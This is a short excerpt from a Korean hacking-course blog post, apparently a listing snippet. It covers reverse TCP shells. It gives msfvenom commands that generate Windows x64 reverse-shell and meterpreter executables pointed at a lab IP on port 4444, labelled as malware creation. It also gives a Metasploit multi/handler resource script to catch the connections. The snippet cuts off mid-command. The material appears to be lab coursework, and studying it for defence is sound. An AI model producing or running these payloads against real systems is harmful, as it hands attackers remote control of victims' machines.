시스템 해킹 131 시스템 해킹 13 [2024.06.26] [Reverse TCP] 01. 악성코드 생성 #msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10.exe #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.250 lport=4444 -f exe > /root/win10_m.exe #vi reverse.rc use exploit/multi/handlerset payload windows/x64/shell/reverse_tcpset lhost 192.168.10.250set lport 4444set exitonsession falseexploit -.. 2024. 6. 27. 이전 1 다음